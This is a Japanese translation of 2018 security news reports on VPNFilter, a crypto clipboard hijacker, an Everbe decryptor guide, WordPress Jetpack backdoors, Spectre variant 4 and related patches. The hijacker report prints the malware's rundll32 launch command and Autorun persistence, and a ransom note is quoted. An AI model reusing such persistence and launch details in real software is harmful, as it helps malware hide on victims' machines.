     このマルウェアは企業と個人用のルータに感染し、暗号化されたWebとトラフィックをスヌーピングし、彼らに遠隔制御を可能にするために、改竄されたデバイス上にバックドアを確立する能力がある。どのような厄介な物で、デバイスが感染させられるのかは、ファームウェアやモデルに依存する。そして、装置のファームウェアの既知の脆弱性や、インターネットに開放されたままになっているリモート管理のような、弱いセキュリティ設定が悪用されていると考えられている。影響を受けるルータの完全なリストは、こちらのSymantecのサイトを閲覧しなさい。
     VPNFilterは、モニターするプラグインをインストールし、感染したルータを介して送信されるWebトラフィックを改竄する。これは、サイバー犯罪者が悪意あるコンテンツを挿入し、ルータを操作不能にしたり、パスワードや他の重要なユーザ情報を盗むことを可能にするためである。このボットネットはまた、簡単に強力なDDoSツールに変換されるので、インターネット衛生上の観点から、広汎な、明白かつ眼前の脅威である。
     別のIoTボットネットであるMiraiは、2016年10月に遡るが、その悪名高い攻撃でDNSサービス企業Dynをブロックする攻撃を乱用し、多くの著名なWebサイトをアクセス不能なままにした。
     Symantecは、VPNFilter Checkを開発した。このツールは個人と組織を支援する無料のオンラインツールであり、彼らのルータが、VPNFilterマルウェアによって改竄されているか否か即座に決定することができるものである。
     より正確には、VPNFilter Checkは、家庭もしくは企業のネットワークが、感染させられているルータによって変更されたか否かを突き止めるツールである。
     「このマルウェアは、他の殆どのIoT脅威と異なり、再起動した後でさえ、感染したデバイス上に永続的存在を維持する能力をがある」と、「SymantecのオンラインVPNFilter Checkツールは、家庭もしくは企業のルータが、この脅威で改竄されているか否かを決定する簡単な方法を、彼らに提供するものである」と、Stephen Trilling(Symantecの上席副社長兼セキュリティ解析研究部門本部長)は発言している。
     アンチウィルス産業で経験豊かなVesselin Bontchevは、このツールは、IoTデバイスが感染しているか否かの確認を提供するのではなく、VPNFilterが、接続を妨害しているか否かを検出するものであると、The Registerに告げている。
     「このツールは、一般的にルータ中のVPNFilterを検出するのではなく、何かがHTTPS接続を妨害しているか否かを検出するだけのものである」と、Bontchevは説明している
     「VPNFilterの一つのコンポーネント(常駐していない)が、HTTPS接続の妨害を実行することができる。そのコンポーネントが、そこに存在し、且つ、アクティブであるなら、そのコンポーネントが実行するHTTPSのHTTPへのダウングレードは、検出されるだろう。」


    クリップボード・ハイジャッカー・マルウェアは、230万Bitcoinアドレスを監視している
    BleepingComputer : News>Security (2018/06/30)
     仮想通貨は、ここ数年で急激な成長を見せているが、依然として仮想通貨を送信することは、ユーザに長くてとても覚えきれないようなアドレスをコインの送信に要求している。これに起因して、仮想通貨を送信するとき、多くのユーザは、或るアプリケーションからメモリにそのアドレスをコピーし、彼らがコインを送信するために使用する別のアプリケーションに、それをペーストしている。
     攻撃者は、ユーザがアドレスをコピー・アンド・ペーストしていることを認識しているので、これを悪用するマルウェアを作成した。CryptoCurrency Clipboard Hijackersと呼ばれるこの種のマルウェアは、仮想通貨のアドレスに関してWindowsクリップボードを監視する。そして、仮想通貨のアドレスが検出されたなら、そのアドレスを彼らがコントロールしているアドレスと入れ替える。ユーザが、それをペーストした後、そのアドレスを二重チェックした場合を除き、送信されたコインは、所定の受け手の代わりに攻撃者のコントロール下にあるアドレスに送られるだろう。
     我々は、過去に仮想通貨クリップボード・ハイジャッカーについて記述しており、それは新しいものではないが、今までのサンプルの殆どは、40万から60万の仮想通貨アドレスを監視していた。今週、BleepingComputerは、230万もの仮想通貨アドレスを監視しているこの種のマルウェアに気が付いた。


    マルウェアによって監視されている230万の仮想通貨アドレス

     このマルウェアが、Windowsクリップボード中に発見した仮想通貨アドレスを置き換える方法を示すために、我々は、こちらにビデオを作成した。
     このビデオで、あなたは、このマルウェアが、Windowsクリップボードにコピーされた仮想通貨アドレスを取得し、それを、彼らがコントロールしている別のアドレスに置き換える方法を見ることができる。ユーザがペーストしたアドレスを二重チェックした場合を除き、ユーザは、このような置き換えが行われていることが全く分からないだろう。

    感染の仕組み

     この感染は、今週拡散していたAll-Radio 4.27 Portableマルウェア・パッケージの構成部分として見つけられた。インストールされるとき、d3dx11_31.dllという名前のDLLが、WindowsのTempフォルダにダウンロードされ、ユーザがコンピュータにログインした時、"DirectX 11"と呼ばれるAutorunが、このDLLを稼働するために作成される。
     このDLLは、"rundll32 C:\Users\[user-name]\AppData\Local\Temp\d3dx11_31.dll,includes_func_runnded"コマンド付きで、rundll32.exeを使用して実行される。


    この感染を起動しているRundll32.exe

    クリップボード・ハイジャッカーから自身を保護するには

     このようなマルウェアは、バックグラウンドで実行され、稼働している兆候を示さないので、感染していることを見つけるのは簡単ではない。それ故、この種の脅威から自身を保護するためには、インストールされているアンチウィルス ソフトを常にアップデートしておくことが重要である。
     実際に仮想通貨を送信する前に、全ての仮想通貨ユーザは、仮想通貨を送信しようとしているアドレスを二重チェックすることが重要である。こうすることで、アドレスが意図したアドレス以外のアドレスに置き換えられているか否かを確認できる。


    Windows Defenderは、正当なファイルをTrojan:Win32/Bluteal.B!rfnとして検出している
    BleepingComputer : News>Security (2018/06/27)
     最近、Windows Defenderが、突然ファイルをTrojan:Win32/Bluteal.B!rfnとして検出したとする多くの報告があった。検出されたファイルはCPUマイナーから正当なWindowsファイルにまで及んでいる。
     例えば、6月24日に、我々のフォーラムへの訪問者の一人は、このフォーラムにWindows Defenderが、正当なファイルである C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#
    \daf01e12fa59ed340363c44b7deff15e\Microsoft.CertificateServices.PKIClient.Cmdlets.ni.dll をTrojan:Win32/Bluteal.B!rfn として検出したと投稿した。


    Trojan:Win32/Bluteal.B!rfnの誤検出

    MicrosoftのWindows Defender Security Intelligenceサイトのページによると、Trojan:Win32/Bluteal.B!rfnの検出は、2018年5月18日頃に追加されたようである。これはヒューリスティック定義のようであるが、その説明は、「この脅威は、あなたのPC上で悪意あるハッカーの選択した幾つかのアクションを実行する」という漠然としたものである。
     類似のケースを検索している時、私は多くの他のプログラムレポート(5月末からWindows DLLがBluTealとして検出される)を発見した。例えば、2日前から、あるReddit(【訳註】 アメリカ最大級のソーシャルニュースサイト、掲示板(ニコニコ大百科より))スレッドでは、様々なユーザが多くのWindows 10 1803上で同じ挙動を報告していることが示されている。


    画像をクリックすると拡大します

    Blutealとして検出されるプログラムやファイルの簡単なリストは以下を含んでいる。

    C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#
    \daf01e12fa59ed340363c44b7deff15e\Microsoft.CertificateServices.PKIClient.Cmdlets.ni.dll
    C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vde5ed89a#
    \457b4a4c20bed2246e03f1f9e5eaa1a5\Microsoft.VisualStudio.Utilities.Internal.ni.dll
    ArchieSteamFarm.dll
    SPCB.exe (SharePoint Client Browser)
    Oracle_VM_VirtualBox_Extension_Pack-5.2.12.vbox-extpack
    AutoHotkey
    mtrand.so

    Microsoftは、これが誤検出であることを認めている

     この件に関してMicrosoftに接触した後、私は、この検出が誤検出であること、この問題は既に解決していると告げられたが、どの定義ファイルがアップデートされたのか、いつ解決されたのかについては告げられていない。
     定義ファイルのバージョン 1.271.37.0 によると、この定義は、昨日(6月26日、このアップデートがリストされているので)解決されたようである。
     依然として、この誤検出が見られるのであれば、あなたは、Windows Defenderの新しいアップデートをチェックし、アップデートをインストールしなさい。
     新しいアップデートをチェックするには、設定 > 更新とセキュリティ > Windows Update に進み、更新の確認を選択する。新しいWindows Defender定義ファイルが利用可能であれば、"Definition Update for Windows Defender"としてリストされている。


    Everbe身代金要求型マルウェア用の復号ツールがリリースされた
    BleepingComputer : News>Security (2018/06/14)
     Everbe身代金要求型マルウェア用の復号ツールは、Michael GillespieMaxime Meignanによってリリースされた。このツールは、犠牲者が彼らのファイルを無料で取り戻すことを可能にするものである。この身代金要求型マルウェアは、現在どのようにして拡散しているのか分かっていないが、犠牲者は、暗号化されたファイルの暗号化されていないバージョンを持っている限り、復号キーをブルートフォースで見つけるためにそれらを使用することができる。
     犠牲者が感染した時、彼らのファイルは暗号化され、.[everbe@airmail.cc].everbe, .embrace, あるいは .pain拡張子が暗号化されたファイル名に追加される。


    Everbe身代金要求型マルウェアによって暗号化されたファイル

     暗号化されたファイルのある各フォルダに、この身代金要求型マルウェアは、!=How_recovery_files=!.txtと名付けられた脅迫文を作成する。これは支払い情報に関して everbe@airmail.cc にメールするよう犠牲者に指示している。


    Everbe身代金要求型マルウェアの脅迫文

     Everbe身代金要求型マルウェアに感染し、暗号化されたファイルを持っている人々は、以下のガイドを使用して、無料でファイルを復号することができる。あなたがファイルの復号に支援を必要とするのであれば、遠慮無くEverbe Ransomware Help Topicで質問しなさい。

    Everbe身代金要求型マルウェアの復号方法

     Everbe身代金要求型マルウェアの犠牲者は、暗号化され、.everbe, .pain, もしくは .embrace拡張子にリネームされているたファイルを持っていることで特定することができる。Everbe身代金要求型マルウェアによって暗号化されたファイルを復号するには、先ず、以下のInsaneCrypt Decryptorをダウンロードする必要がある。このツールは、Everbeもサポートしている。

    InsaneCrypt Decryptorのダウンロード(直リンク)

     ダウンロードしたら、この復号ツールを起動するために実行ファイルをダブルクリックする。あなたはメインスクリーンを表示されるだろう。


    復号ツールのメインスクリーン

     復号キーをブルートフォースで見つけるために、我々は、暗号化されたファイルとオリジナルの暗号化されていないファイルの両方を必要とする。この二つを持っているなら、SettingメニューをクリックしBruteforcerを選択しなさい。これは、以下に示したように、暗号化されたファイルと暗号化されていないバージョンの両方を選択するように要求してくる。


    ブルートフォース用のファイル選択画面

     両方のファイルを選択したら、ブルートフォースで復号キーを見つけるためにStartボタンをクリックする。このプロセスは、かなり時間がかかるので、辛抱強く待ちなさい。


    ブルートフォース中の画面

     終了すると、この復号ツールは、復号キーが発見されたと伝えてくるので、右上の X ボタンを押してBruteForcerウィンドウを閉じる。そこで、以下に示したように、復号キーが、この復号ツール中にロードされる。


    ロードされた復号キー

     我々は今、復号するディレクトリを選択する必要がある。あなたがドライブ全体を復号したいのであれば、ドライブレター自体を選択しなさい。例えば、以下の画像で、あなたは、C:\ ドライブが選択されているのを確認できる。


    ドライブが選択されている

     準備ができたら、Everbeで暗号化されたファイルの復号を開始するために、Decryptボタンをクリックする。Decryptボタンをクリックすると、このプログラムは暗号化されている全てのファイルを復号し、そのウィンドウ中に復号状況を表示する。


    ファイルの復号中

     終了したら、この復号ツールは復号されたファイルの総数を表示する。ファイルの一部がスキップされているのであれば、そのファイルのパーミッションに起因しているかもしれない。


    復号終了

     これで、あなたのファイルは復号されたが、暗号化されたファイルそのものは、依然としてコンピュータ上に存在している。あなたのファイルが適切に復号されていることを確認したら、暗号化されたファイル全てを一つのフォルダに移動させるためにCryptoSearchを使用しなさい。そこで、あなたは、それらを削除したりアーカイブしたりすることができる。
     今、この復号ツールを終了し、通常通りコンピュータを使用することができる。あなたが、この復号ツールの使用に関して支援を必要とするのであれば、我々の、Everbe Ransomware Help Topic で質問しなさい。

    脅迫文

    Hi !
    If you want restore your files write on email - everbe@airmail.cc
    In the subject write - id-de9bcb


    VPNFilterは、ASUS, D-Link, Huawei, Ubiquiti, UPVEL, ZTEにも感染することができる
    BleepingComputer : News>Security (2018/06/06)
     過去数ヶ月で54カ国、50万を超えるルータとNASデバイスに感染したVPNFilterマルウェアは、今まで思われていたよりずっと酷いものである。
     Cisco Talosセキュリティチームによって本日公開された新たな技術的詳細によると、当初、Linksys, MikroTik, Netgear, TP-Link, QNAPのデバイスに感染すると考えられていたこのマルウェアは、ASUS, D-Link, Huawei, Ubiquiti, UPVEL, ZTEによって製造されたルータにも感染することができる。
     VPNFilterに対して脆弱性のあるデバイスのリストは、Ciscoのオリジナルのレーポートから急増している(16のデバイスモデルから71に、ことによると、もっと多く)。完全なリストは、この記事の末尾に提示している。

    新たなVPNFilterプラグイン

     更に、研究者は、このマルウェアの三段階開発システムの一部としての第三段階のプラグインとしてパックされた新たなVPNFilterの能力を発見した。


    VPNFilter構造

    Ciscoの専門家は、彼らが以下の二つの新しい第三段階プラグインを発見したと発言した。

    ssler - 中間者攻撃を介してポート80のWebトラフィックをインターセプトし改竄するためのプラグイン。このプラグインはHTTPSをHTTPにダウングレードすることをサポートしている。
    dstr - デバイスのファームウェア・ファイルを上書きするプラグイン。Ciscoが既知のVPNFilterは、デバイスのファームウェアを削除することができた。彼らの最近のレポートでは、この具体的な第三段階プラグインに対する機能を指摘している。

     これら二つの新しいプラグインは二つの既知のものに追加されている。

    ps - ネットワークパケットを盗聴し、特定の種類のネットワークトラフィックを検出するプラグイン。Ciscoはこのプラグインが、しばしば、工業用ソフトウェアやSCADA機器によって使用されるModbus TCP/IPパケットを探すために使用されていると確信しているが、大多数の最近のレポートでは、このプラグインが、TP-Link R600仮想プライベートネットワークに接続されている工業用機器も探していると主張している。
    tor - Torネットワークを介してコマンド&コントロールサーバと通信するためにVPNFilterボットによって使用されるプラグイン。

     一般的な、VPNFilterマルウェアに関する技術的詳細は、Ciscoの最初のレポートに存在している。ssler, dstr, ps第三段階プラグインに関する詳細は、本日公開されたレポートに存在している。
     VPNFilterボットネットは、世界中のデバイスに感染したことで発見されたが、研究者は、このボットネットが、ウクライナのITインフラストラクチャへのサイバー攻撃を準備している時に、その発見を公開した。このサイバー攻撃は、5月末ウクライナのキエフで行われるUEFAチャンピオンリーグサッカーの決勝の日に起こると、多くの人は信じている。
     コマンド&コントロールサーバを乗っ取ることで、このボットネットを無力化するためにFBIが介入した。それにも拘わらず、ロシア軍の一部隊と信じられているこのマルウェアの背後にいるグループは、ウクライナのネットワーク上の感染したデバイスへの注視を継続するために、最近新しいボットネットをアッセンブルすることを始めた。
     以下にVPNFilterマルウェアによって標的にされているルータとNASデバイスのアップデートされたリストを掲げておく。Ciscoは先月、VPNFilterはデバイスに感染するために0-Dayの脆弱性を使用していないと発言した。これは、リストされているモデルは、リリースされている古いファームウェアに対する攻撃に脆弱であることを、そして、最新のファームウェアにアップデートすることは、そのデバイスを、このマルウェアが到達できない場所に保持することを意味している。
     ユーザが、ルータのファームウェアをアップデートできず、新しいルータにもアップデートできないが、デバイスからこのマルウェアを削除したいのであれば、このマルウェアを安全に削除するための手順は、この記事において示されている。感染したデバイスからVPNFilterを削除することは、このマルウェアが、SOHOルータとIoTデバイスに関してブート・パーシステンスを達成することのできる二つのマルウェア株の一つなので、相当困難なことである。更に、ルータがこのマルウェアに感染した目に見える兆候は、あなたがルータのファームウェアをスキャンした場合を除いて存在しないし、あなたが感染を認識した場合でさえ困難である。我々が現時点で与えることのできる最良のアドバイスは、間違いなくアップデートしたファームウェアでルータを稼働することである。

    Asus:
    RT-AC66U (new)
    RT-N10 (new)
    RT-N10E (new)
    RT-N10U (new)
    RT-N56U (new)
    RT-N66U (new)

    D-Link:
    DES-1210-08P (new)
    DIR-300 (new)
    DIR-300A (new)
    DSR-250N (new)
    DSR-500N (new)
    DSR-1000 (new)
    DSR-1000N (new)

    Huawei:
    HG8245 (new)

    Linksys:
    E1200
    E2500
    E3000 (new)
    E3200 (new)
    E4200 (new)
    RV082 (new)
    WRVS4400N

    Mikrotik:(バグはRouterOSバージョン6.38.5で修正された)
    CCR1009 (new)
    CCR1016
    CCR1036
    CCR1072
    CRS109 (new)
    CRS112 (new)
    CRS125 (new)
    RB411 (new)
    RB450 (new)
    RB750 (new)
    RB911 (new)
    RB921 (new)
    RB941 (new)
    RB951 (new)
    RB952 (new)
    RB960 (new)
    RB962 (new)
    RB1100 (new)
    RB1200 (new)
    RB2011 (new)
    RB3011 (new)
    RB Groove (new)
    RB Omnitik (new)
    STX5 (new)

    Netgear:
    DG834 (new)
    DGN1000 (new)
    DGN2200
    DGN3500 (new)
    FVS318N (new)
    MBRN3000 (new)
    R6400
    R7000
    R8000
    WNR1000
    WNR2000
    WNR2200 (new)
    WNR4000 (new)
    WNDR3700 (new)
    WNDR4000 (new)
    WNDR4300 (new)
    WNDR4300-TN (new)
    UTM50 (new)

    QNAP:
    TS251
    TS439 Pro
    QTSソフトウェアを実行している他のQNAP NASデバイス

    TP-Link:
    R600VPN
    TL-WR741ND (new)
    TL-WR841N (new)

    Ubiquiti:
    NSM2 (new)
    PBE M5 (new)

    UPVEL:
    型番不明(new)

    ZTE:
    ZXHN H108N (new)


    ハッカーは、WordPressサイトにバックドア化されたプラグインをインストールする新しい方法を発見している
    BleepingComputer : News>Security (2018/05/23)
     ハッカーは、オープンソースWordPress CMSを実行しているWebサイトにバックドア化されたプラグインをインストールする今まで確認されていない方法を見つけ出した。この新しいテクニックは、弱い保護下にあるWordPress.comアカウントとJetpackプラグインの使用に依存している。
     このテクニックは大変複雑であり、サイトをセキュリティ侵害するためには、ハッカーは、複数の物が攻撃の成功を妨げるので、様々なステップを踏まなければならない。
     それであるにも拘わらず、WordPressサイト・セキュリティ企業Wordfenceからのレポートと、サイバー犯罪者によってハイジャックされたサイトオーナーからの公式のWordPress.orgフォーラムへの幾つかの投稿によると、攻撃は5月16日から発生している。

    攻撃の動作方法

     この攻撃の最初のステップは、ハッカーが公に晒されたユーザ名とパスワードを取得し、WordPress.comアカウントへのログインを企てることで構成される。
     複数のアカウントでパスワードを使いまわし、プロファイルに関して二要素認証を有効にしていないユーザは、彼らのアカウントを乗っ取られる余地がある。
     明確化のために言うと、WordPress.comアカウントはAutomaticによってホストされている専用のブログを管理するために使用されているものであり、WordPress.orgやオープンソースベースのセルフホスト型WordPressの管理者アカウントとは異なるものである。
     WordPressオープンソースCMSは、WordPressコミュニティーによって管理されているが、多くのAutomatic開発者が、このオープンソース・プロジェクトに貢献し、常に、大きな影響を与え、このオープンソースCMSと緊密に結びついている。これが、数年前にAutomaticがWordPress.comで使用されていた解析プラグインを採用し、これをセルフホスト型WordPressサイト用のオープンソースプラグインとしてリリースした理由である。

    ハッカーはJetpackを介してバックドア化されたプラグインをインストールする

     このJetpacと名付けられた解析モジュールは、多くの新しい機能で成長し、今や、WordPressサイトにおいて最も人気のあるプラグインの一つである。
     このプラグインの機能の一つが、セルフホスト型WordPressサイトをWordPress.comアカウントに接続させ、各サイトにインストールされたJetpacプラグインを介して、数十もしくは数千のセルフホスト型WordPressを管理するためにWordPress.comダッシュボードの内部でJetpackパネルを使用する能力である。
     Jetpackが提供しているオプションの一つは、WordPress.comのJetpackダッシュボードから異なるサイトにプラグインをインストールする能力である。
     このプラグインは、公式のWordPress.orgレポジトリ上にホストしたり非表示にしたりするまでもなく、攻撃者は、悪意あるコードを含むZIPファイルを簡単にアップロードし、次に、各サイトに送信することができる。

    Jetpacプラグイン

     Wordfenceによると、WordPress.comアカウントを乗っ取り、リンクされたセルフホスト型WordPressサイトを発見したハッカーは、これまで安全であったサイトにバックドア化されたプラグインを配備するために、このリモート管理機能を乱用している。

    ハッキングは一週間発生している

     エキスパートは、攻撃者が、"pluginsamonsters"(その後の5月21日に"wpsmilepack"と別の名前に変更された)と名付けられたプラグインを配備することを5月16日に開始したと発言している。
     セキュリティ侵害された数は不明であり、セキュリティ侵害されたサイトを検出することもまた困難である。
     「このプラグインは、WordPress.comダッシュボードでは表示されるが、アクティブな時、ターゲットのWordPressサイトのプラグインリストでは非表示である」と、Wordfenceチームは発言している。
     今のところ、ハッカーは、スパムや技術サポートスカムにユーザをリダイレクトするために、これらのバックドアを使用している。
     WordPress.comアカウントにJetpackプラグインを接続しているセルフホストサイトのオーナーは、WordPress.comダッシュボード内部で、セルフホストされたサイトに配備されたこのプラグインを検証するように促されている。
     疑わしいプラグインが見つかった場合、即座にWordPress.comのアカウントパスワードを変更し、そのアカウントに二要素認証を有効にし、サイトクリーニング・プロシージャを起動しなさい。
     Wordfenceは、この新しいサイトハイジャック・テクニックの背後で脅威を与えている者共は、今までセルフホストされたWordPressサイトをターゲットにしてきたと、発言している。今年2月、彼らは、管理者アカウントの認証を推測し、直接、源でセルフホストされたWordPressサイトをハイジャックしようとして、"credential stuffing"(リークされたユーザ名とパスワードの組み合わせを使用すること)と呼ばれるテクニックを使用していた。


    GoogleとMicrosoftは、新たなSpectre攻撃を公開した
    BleepingComputer : News>Security (2018/05/21)
     GoogleとMicrosoftのセキュリティ研究者は、AMD, ARM, IBM, Intelによって製造されたプロセッサが影響を受けるSpectre攻撃の新たな二つの変種を発見した。
     この新しいフローに関する噂は、今月初めドイツの雑誌で、オンラインにリークされていたが、事実に基づく詳細に関しては、本日公開された。
     AMD, ARM, IBM, Intel, Microsoft, Red Hat, Ubuntuは、記述の時点でセキュリティ・アドバイザリを公開している(緩和策と共に、このバグの動作方法の説明を含む)。

    StectreNGとして知られているバグ

     過去数週間SpectreNGと呼ばれてきたこのバグは、昨年発見され2018年の初めにアナウンスされた、以前のMeltdownとSpectreのバグに関連している。
     GoogleとMicrosoftの研究者は個々にこのバグを発見した。このバグは、MeltdownとSpectreのバグと類似した動作をする。これが、この脆弱性に完全に別の名前を与えるのではなく"variant 3a"、"variant 4"として分類された理由である。

    Variant 1: 境界チェックのバイパス(CVE-2017-5753)。別名、Spectre v1
    Variant 2: 分岐ターゲットのインジェクション(CVE-2017-5715)。別名、Spectre v2
    Variant 3: 不正なデータ キャッシュの読み込み(CVE-2017-5754)。 別名、Meltdown
    Variant 3a: 不正なシステムレジスタの読み込み(CVE-2018-3640)
    Variant 4: 投機的ストアバイパス(CVE-2018-3639)

    Variant 3aは、Meltdownフローの亜種であるが、Variant 4は、新たなSpectre様の攻撃である。これら二つの内で重要なものは、Variant 4である。この二つのバグは同じ理由、即ち、投機的実行(全ての最先端のCPU中に見出される機能で、条件分岐の先を予め実行し、後で不必要なデータを廃棄することによってパフォーマンスを改善する役割も持っている)で発生する。
     違いは、Variant 4が投機的実行プロセスの様々な部分(CPUの内部にあるStore Bufferの内部データ)に影響を与えることである。Red Hatは、このバグが最新のCPUに影響を与える方法の説明ビデオをYouTubeで公開している。
     Red Hatは、これをより技術的に分類したので、この脆弱性は...

     ...特権化されたコード中に正確に定義された命令シーケンスの存在に依存している、並びに、メモリは、最新のメモリ書き込みが起こったアドレスから読み込むという事実は、古い値を閲覧し、続いて、投機的実行が実際には委任していない命令でさえ、アップデートをマイクロプロセッサのデータキャッシュに発生させるかもしれない。

     「この脆弱性の悪用に成功した攻撃者は、信頼境界線を越えて特権化されたデータを読み込むことが可能になる」と、Microsoftは類似のアドバイザリで発言し、このフローがSandbox化された環境から抜け出すために使用することができるとするRed Hatのアセスメントを確認している。Microsoftはまた、Variant 4バグに関する詳細なブログ(6:23 AM - May 22, 2018のツイート)を公開している。
     GoogleのJann Hornもまた、proof-of-concept(概念の実証)コードを公開している。
     IntelとAMD x86チップセットとPOWER 8, POWER 9, System z、およびARM CPUは、影響を受けることが知られている。Intelはセキュリティアドバイザリにおいて、影響を受けるCPUシリーズの詳細なリストを公開した。
     Variant 4は、ブラウザ中のJavaScriptコードを介して遠隔から悪用することが可能である。けれども、Microsoftは、如何なる悪用の企ても検出されていないと発言している。

    追加のパッチがリリースされている

     Leslie Culbertson(Intelの執行副社長兼製品保証&セキュリティ本部長)は、2018年1月からのオリジナルのMeltdownとSpectreのパッチは、同様にVariant 4を緩和するのに十分なものであると発言している。
     それでもなお、Intelは、新しいパッチをアナウンスした。
     「我々は既に、OEMシステム・メーカーとシステム・ソフトウェア・ベンダにベータ版でVariant 4に関するマイクロコードアップデートを配布した。我々は数週間以内にBIOSとソフトウェアアップデートがリリースされるだろうと予期している。」 更に、「この緩和策は、顧客が有効にするか否かを選択するoff-by-default(DefaultではOFF)に設定されるだろう」と、Culbertsonは発言している。
     「この設定で、我々はパフォーマンスに影響がないことを観察している。有効にした場合は、凡そ2から8%パフォーマンスに影響が出ることを観察した」と、Culbertsonは追加している。AMDもまた、ホワイトペーパーにおいて、Variant 4緩和策を無効にしたままにすることを推奨している。
     Red HatとMicrosoftは、同様に新しいパッチをアナウンスした(緩和策のアドバイスに関するセキュリティアドバイザリへのリンクを参照)。Ciscoは、彼らのデバイスは影響を受けないと発言している。


    Windows 10の4月のアップデートのロールアウトが、Intelと東芝のSSD搭載デバイスに関して停止された
    BleepingComputer : News>Security (2018/05/16)
     Microsoftは、特定の種類のIntelと東芝のSSD(ソリッド・ステート・ドライブ)を使用しているコンピュータに対して、Windows 10 の2018年4月のアップデートの提供を停止した。
     Microsoftは、2018年4月のWindows 10アップデートが、以下を使用しているデバイスに関して適切に動作しないという複数のユーザのレポートに従う形でこの決定をした。

    Intel SSD 600p Series
    Intel SSD Pro 6000p Series
    Toshiba XG4 Series
    Toshiba XG5 Series
    Toshiba BG3 Series

    Intelと東芝の問題は別々であるかのようである。より具体的には、Intel SSDを使用しているWindows PCは、頻繁にクラッシュし、再起動した後、UEFI(【訳註】 Unified Extensible Firmware Interface、BIOSに代わる仕様)画面になる。他方、東芝SSDのユーザは、バッテリの短命化やSSDドライブが非常に熱くなると報告している。
     両方共、Microsoftは、これらSSDのユーザは、Windowsの以前のバージョン(Fall Creators Update)に戻すか、ユーザがダウングレードすることができるWindows設定パネルにアクセスできない場合では、OS全体を再インストールすることを推奨している。
     奇妙なのは、このIntelのシリーズは、通常、Surface Proラップトップの一部に搭載されているSSDである。これは、Microsoftが、独自の自国産デバイスに関して、2018年4月のアップデートの徹底的な検証に失敗したことを意味している。
     二つのサポートトピック(1, 2)において、Microsoftは、影響を受ける可能性のある全てのデバイスを特定し、2018年4月のアップデートをインストールさせないようにするために、OEMプロバイダ、Intel、東芝と共同で作業していると発言している。
     Microsoftは、Intel SSD問題を修正する予定期日を提供していないが、東芝SSDを使用しているデバイスに関する解決策は6月初旬を予定していると発言している。


    PDFが、あなたのPCをグチャグチャにする方法はどれだけあるのだろうか? 今回のAdobe アップデートだけで47
    The Register : Security (2018/05/14)
     Adobeが、Acrobat, Reader, Photoshop用のセキュリティアップデートをポストした。それらの多くは緊急のフロ ーである。
     Adobeは、AcrobatとReaderのアップデートが、CVEにリストされている全47の脆弱性(2ダースに及ぶPDFリーダー中のリモートコード実行のフローを含む)を解決すると発言している。Adobeは、このバグの何れも未だ活発な標的になってはいないと言及している。
     これら47のCVEの内、13は、Use-After-Free(【訳註】 一度解放したメモリブロックを再度使ってしまうバグ)リモートコード実行のバグであり、別の7つは、ヒープオーバーフロー・エラーを介してリモートコード実行を可能にするものである。残りのリモートコード実行の脆弱性は、double free error (CVE-2018-4990、【訳註】 アプリケーション中で通常発見される多くの一般的なメモリ損壊の内の一つ、Double Freeエラーは、同じメモリの場所を二回解放することによって発生する)、out-of-bounds write error (CVE-2018-4950、【訳註】 領域外メモリへの書き出し)、type confusion error (CVE-2018-4953、【訳註】 型の混同によりリモート攻撃者がシステム上で任意のコードを実行できる(IBMサポートより))、untrusted pointer dereference (CVE-2018-4987、【訳註】 不正確なポインタ計算、不完全な初期化やメモリ解放による不正なポインタへのアクセス(JVN iPediaより))である。
     今回修正された全脆弱性の内、19のパッチされたフローは、境界外読み込みエラーを介しての情報漏洩のバグであり、別の二つ(CVE-2018-4994, CVE-2018-4979)は、セキュリティバイパス脆弱性と説明されている。他の二つの情報漏洩のフローは、NTLM SSO hash theft (CVE-2018-4993、【訳註】 WindowsのパスワードのNTLMハッシュをリモートから窃取できる脆弱性(マイナビニュースより))とメモリ損壊 (CVE-2018-4965)のエラーである。
     AcrobatとReader DCのアップデートされたバージョンは、2018.011.20040である。また、Acrobat 2017とAcrobat Reader DC 2017のパッチされたバージョンは、2017.011.30080でである。Acrobat Reader DCとAcrobat DCの"Classic 2015"バージョンは、update 2015.006.30418でパッチされている。
     他方、Photoshopは、CVE-2018-4946(境界外書き込みエラーに起因するリモートコード実行のフロー)をパッチするためにアップデートされた。このフローの発見は、Trend MicroのZero Day Initiativeを介して通知した、Giwan Goの手柄である。
     Photoshop CC 2018(Windows版、Mac版共)を実行している人々は、バージョン19.1.4をインストールしなさい。Photoshop CC 2017を使用している人々は、18.1.4をダウンロードしなさい。
     この最新のAdobeアプデートは、AdobeがPatch Tuesday(パッチの火曜日)と同時にスケジュールされたFlash用の修正群をリリースした後、一週間以内に出現している。このアップデートはまた、Mac、Windows両方のCreative Cloud用アップデートを含んでいる。


    テキスト爆弾と"black dot of death"(「死の黒丸」)がWhatsAppとiMessageユーザを悩ませている
    Bitdefender : Hot for Security (2018/05/12)
     あなたが、大きく報道されていることを信じるのであれば、この問題が実際よりもっと重大なものだと、あなたは考えるだろう。
     「あなたのiPhoneを一つのテキストメッセージで消し去ってしまう"black dot of death"(『死の黒丸』)に気をつけなさい」と題された、Metro紙の記事を読みなさい。Liverpool Echoは、「あなたのスマホを破壊するかもしれないWhatsApp『テキスト爆弾』に関する警告」と述べている。そして、Birmingham Mailは、「このWhatsApp『テキスト爆弾』は、受信者のスマホを破壊する」と、主張している。
     「テキスト爆弾」とも呼ばれる脆弱性が、あなたのAndroidやiPhoneの通常操作をクラッシュさせる能力があることは真実であるが、あなたのスマホを「破壊する」と主張するのは、行き過ぎである。
     この問題の発端は、Redditユーザが、特別に細工されたテキストメッセージがWhatsAppを含む幾つかのメッセージングアプリケーションをクラッシュさせたと主張した6日前のことである。

     このメッセージ(引用符で囲まれ、laugh-until-you-cry(泣くまで笑う)絵文字が続いている文章)は、一見して無害なように見える。しかし、この絵文字と後ろの引用符との間には、表示されないように隠された数千の文字が、コッソリと隠されている。
     残念ながら、WhatsAppのようなアプリケーションは、非表示の文字列のイタズラを優雅に取り扱うことに失敗し、イライラし、ひっくり返る(アプリケーション・クラッシュを発生する)。そして、ある場合には、そのデバイス上に別の不安定さを発生させる。
     このペイロードは、iOSよりAndroidデバイスのほうが、そのインパクトにおいてより目覚ましいものがあったと、このテキスト爆弾の作者は発言している。
     今、これは、Appleの支持者達が甘んじて受ければいいという種類のニュースではない。類似の「テキスト爆弾」がAppleのデバイスをクラッシュさせるという報告がなされたのは、この一両日後のことである。
